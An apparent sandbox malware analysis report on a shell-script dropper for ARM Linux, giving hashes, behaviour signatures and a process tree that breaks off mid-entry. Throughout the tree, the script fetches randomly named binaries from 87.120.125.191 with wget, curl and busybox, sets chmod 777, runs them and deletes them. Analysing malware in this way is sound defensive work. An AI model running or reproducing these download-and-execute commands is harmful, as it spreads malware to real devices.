ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2

Analysis

max time kernel
30s
max time network
57s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
20/11/2024, 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
Size

10KB
MD5

45b72c6c039a3d67373f15957984b0e7
SHA1

8eb92a8fd6c526682b007d3c8fd7906f1516c6ae
SHA256

ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2
SHA512

d8608a7803cb7783e729069dd99b25a75e4a730d130b624f1cf604a17ac9d1fe65fd00563d154b9c02e552d8c8324832be6cebbbd8c9eb96f4a92cf3959dfd50
SSDEEP

192:mN1RZ53Z5G7VlVNVYTn177f0adFIG6PrPU7FtTlMc2McqMcycXcHcuPbj9lx7x4M:BScGbEdG2d+SXBG2d+S3Z

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 24 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
880	chmod
681	chmod
775	chmod
799	chmod
848	chmod
861	chmod
886	chmod
907	chmod
691	chmod
746	chmod
783	chmod
829	chmod
855	chmod
892	chmod
898	chmod
697	chmod
714	chmod
816	chmod
835	chmod
841	chmod
868	chmod
874	chmod
729	chmod
767	chmod

Executes dropped EXE 24 IoCs

Checks CPU configuration 1 TTPs 24 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 48 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
910	wget
832	wget
833	curl
834	busybox
836	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
837	rm

Writes file to tmp directory 24 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	curl
File opened for modification	/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	curl
File opened for modification	/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	curl
File opened for modification	/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	curl
File opened for modification	/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	curl
File opened for modification	/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	curl
File opened for modification	/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	curl
File opened for modification	/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	curl
File opened for modification	/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	curl
File opened for modification	/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	curl
File opened for modification	/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	curl
File opened for modification	/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	curl
File opened for modification	/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	curl
File opened for modification	/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	curl
File opened for modification	/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	curl
File opened for modification	/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	curl
File opened for modification	/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	curl
File opened for modification	/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	curl
File opened for modification	/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	curl
File opened for modification	/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	curl
File opened for modification	/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	curl
File opened for modification	/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	curl
File opened for modification	/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	curl
File opened for modification	/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	curl

/tmp/ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
/tmp/ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
1⤵
PID:652
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:655
- /usr/bin/wget
  wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:657
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:669
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:678
- /bin/chmod
  chmod 777 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - File and Directory Permissions Modification
  PID:681
- /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  ./HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Executes dropped EXE
  PID:683
- /bin/rm
  rm HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:684
- /usr/bin/wget
  wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:686
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:688
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:690
- /bin/chmod
  chmod 777 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - File and Directory Permissions Modification
  PID:691
- /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  ./EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Executes dropped EXE
  PID:692
- /bin/rm
  rm EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:693
- /usr/bin/wget
  wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:694
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:695
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:696
- /bin/chmod
  chmod 777 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - File and Directory Permissions Modification
  PID:697
- /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  ./UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Executes dropped EXE
  PID:698
- /bin/rm
  rm UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:700
- /usr/bin/wget
  wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:701
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:705
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:711
- /bin/chmod
  chmod 777 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - File and Directory Permissions Modification
  PID:714
- /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  ./2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Executes dropped EXE
  PID:716
- /bin/rm
  rm 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:717
- /usr/bin/wget
  wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:718
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:722
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:727
- /bin/chmod
  chmod 777 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - File and Directory Permissions Modification
  PID:729
- /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  ./urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Executes dropped EXE
  PID:731
- /bin/rm
  rm urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:732
- /usr/bin/wget
  wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:734
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:738
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:743
- /bin/chmod
  chmod 777 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  ./A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Executes dropped EXE
  PID:747
- /bin/rm
  rm A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:749
- /usr/bin/wget
  wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:752
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:756
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:763
- /bin/chmod
  chmod 777 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  ./I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Executes dropped EXE
  PID:768
- /bin/rm
  rm I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:769
- /usr/bin/wget
  wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:771
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:773
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:774
- /bin/chmod
  chmod 777 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - File and Directory Permissions Modification
  PID:775
- /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  ./DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Executes dropped EXE
  PID:776
- /bin/rm
  rm DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:777
- /usr/bin/wget
  wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:778
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:779
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:780
- /bin/chmod
  chmod 777 NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  ./NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Executes dropped EXE
  PID:784
- /bin/rm
  rm NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:785
- /usr/bin/wget
  wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:786
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:790
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:795
- /bin/chmod
  chmod 777 FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  ./FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Executes dropped EXE
  PID:800
- /bin/rm
  rm FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:801
- /usr/bin/wget
  wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:803
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:807
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:812
- /bin/chmod
  chmod 777 c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  ./c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Executes dropped EXE
  PID:817
- /bin/rm
  rm c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:819
- /usr/bin/wget
  wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:820
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:825
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:828
- /bin/chmod
  chmod 777 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  ./GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Executes dropped EXE
  PID:830
- /bin/rm
  rm GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:831
- /usr/bin/wget
  wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:832
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:833
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:834
- /bin/chmod
  chmod 777 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  ./8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:836
- /bin/rm
  rm 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:837
- /usr/bin/wget
  wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:838
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:839
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:840
- /bin/chmod
  chmod 777 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - File and Directory Permissions Modification
  PID:841
- /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  ./HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Executes dropped EXE
  PID:842
- /bin/rm
  rm HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:843
- /usr/bin/wget
  wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:844
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:845
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:846
- /bin/chmod
  chmod 777 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - File and Directory Permissions Modification
  PID:848
- /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  ./HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Executes dropped EXE
  PID:849
- /bin/rm
  rm HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:850
- /usr/bin/wget
  wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:851
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:853
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:854
- /bin/chmod
  chmod 777 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - File and Directory Permissions Modification
  PID:855
- /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  ./EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Executes dropped EXE
  PID:856
- /bin/rm
  rm EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:857
- /usr/bin/wget
  wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:858
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:859
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:860
- /bin/chmod
  chmod 777 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  ./UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Executes dropped EXE
  PID:862
- /bin/rm
  rm UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:864
- /usr/bin/wget
  wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:865
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:866
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:867
- /bin/chmod
  chmod 777 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  ./HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Executes dropped EXE
  PID:869
- /bin/rm
  rm HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:870
- /usr/bin/wget
  wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:871
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:872
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:873
- /bin/chmod
  chmod 777 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  ./I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:876
- /usr/bin/wget
  wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:877
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:878
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:879
- /bin/chmod
  chmod 777 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - File and Directory Permissions Modification
  PID:880
- /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  ./DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Executes dropped EXE
  PID:881
- /bin/rm
  rm DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:882
- /usr/bin/wget
  wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:883
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:884
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:885
- /bin/chmod
  chmod 777 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - File and Directory Permissions Modification
  PID:886
- /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  ./2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Executes dropped EXE
  PID:887
- /bin/rm
  rm 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:888
- /usr/bin/wget
  wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:889
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:890
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:891
- /bin/chmod
  chmod 777 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - File and Directory Permissions Modification
  PID:892
- /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  ./urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Executes dropped EXE
  PID:893
- /bin/rm
  rm urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:894
- /usr/bin/wget
